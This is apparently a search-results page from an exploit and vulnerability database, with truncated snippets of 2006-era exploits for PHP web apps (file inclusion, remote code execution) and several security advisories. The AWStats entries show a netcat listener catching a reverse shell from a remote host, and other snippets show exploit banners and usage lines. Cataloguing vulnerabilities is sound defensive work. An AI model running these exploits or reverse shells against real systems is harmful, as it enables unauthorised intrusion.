1763 matches found
PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion
source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...
iziContents-php.txt
!/usr/bin/php -q -d shortopentag=on include/rssfunctions.php line 32-40: .... $GLOBALS"rootdp" = './'; requireonce $GLOBALS"rootdp"."include/config.php"; requireonce $GLOBALS"rootdp"."include/db.php"; requireonce $GLOBALS"rootdp"."include/session.php"; includeonce...
Phorum 5 - pm.php Arbitrary Local Inclusion
Phorum 5 - pm.php Arbitrary Local Inclusion !/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; retu...
EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl EJ3 TOPO 2.2 Remote Code Execution Exploit --------------------------------------------- Note : This Exploit Just run TOPO 2.2 IHST : www.Hackerz.Ir AST : www.aria-security.net Coded & Discovered By Hessam-x use LWP::UserAgent; use LWP::Simple; us...
MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl Tue Jun 13 12:37:12 CEST 2006 [email protected] Exploit HOWTO - read this before flood my Inbox you bitch! - First you need to create the special user to do this use: ./mybibi.pl --host=http://www.example.com --dir=/mybb -1 this step needs a graph...
SpamAssassin spamd vpopmail user vulnerability
Added: 06/09/2006 CVE: CVE-2006-2447 BID: 18290 OSVDB: 26177 Background SpamAssassin identifies spam e-mail using a variety of local and network based tests. spamd is a component of SpamAssassin which allows it to run as a network daemon. Problem When the vpopmail -v and paranoid -P options are...
DotClear 1.2.4 - prepend.php Remote File Inclusion
DotClear 1.2.4 - prepend.php Remote File Inclusion !/usr/bin/php -q -d shortopentag=on ? echo "DotClear = 1.2.4 prepend.php/'blogdcpath' arbitrary remote inclusion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: "propulsé par DotClear"...
Update Protection against AWStats "migrate" Shell Command Injection
AWStats is an open source web analystic reporting tool, suitable for analyzing data from internet services. A vulnerability has been identified in AWStats due to improper validation of user input. The vulnerability may be exploited by attackers to execute arbitrary commands. July 5, 2006On July 5...
NucleusCMS.txt
!/usr/bin/php -q -d shortopentag=on ...
Drupal <= 4.7 (attachment mod_mime) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Drupal = 4.7 attachment modmime poc exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / this works with a user account with upload rights and with permissions to...
Nucleus CMS <= 3.22 (DIR_LIBS) Arbitrary Remote Inclusion Exploit
Exploit for unknown platform in category web applications ================================================================= Nucleus CMS = 3.22 DIRLIBS Arbitrary Remote Inclusion Exploit ================================================================= !/usr/bin/php -q -d shortopentag=on ? echo...
sugarsuite.txt
!/usr/bin/php -q -d shortopentag=on \r\n"; die; / software site: http://www.sugarcrm.com/crm/ i vulnerable code in modules/OptimisticLock/LockResolve.php...
DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution
!/usr/bin/php -q -d shortopentag=on ? echo "DeluxeBB = v1.06 attachment modmime exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "tested & working against a fresh deluxebb installation\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host...
Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit
!/usr/bin/php -q -d shortopentag=on ? echo "Sugar Suite Open Source = 4.2 "OptimisticLock!" arbitrary remote inclusion exploitrn"; echo "by rgod [email protected]"; echo "site: http://retrogod.altervista.orgrnrn"; echo "this is called the "five claws of Sun-tzu"rnrn"; if $argc5 echo "Usage: ph...
FreeBSD : libgadu -- multiple vulnerabilities (3b4a6982-0b24-11da-bc08-0001020eed82)
Wojtek Kaniewski reports : Multiple vulnerabilities have been found in libgadu, a library for handling Gadu-Gadu instant messaging protocol. It is a part of ekg, a Gadu-Gadu client, but is widely used in other clients. Also some of the user contributed scripts were found to behave in an insecure...
FreeBSD : firefox & mozilla -- command line URL shell command injection (2e28cefb-2aee-11da-a263-0001020eed82)
A Secunia Advisory reports : Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in t...
FreeBSD : opera -- command line URL shell command injection (dfc1daa8-61de-11da-b64c-0001020eed82)
An Opera Advisory reports : Opera for UNIX uses a wrapper shell script to start up Opera. This shell script reads the input arguments, like the file names or URLs that Opera is to open. It also performs some environment checks, for example whether Java is available and if so, where it is located...
phpRaid-1.txt
Kurdish Security Advisory phpRaid Remote File Include PHPBB : "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5 "...
AWStats 6.5 - 'migrate' Remote Shell Command Injection
!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...
AWStats 6.5 - migrate Remote Shell Command Injection
AWStats 6.5 - migrate Remote Shell Command Injection !/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from...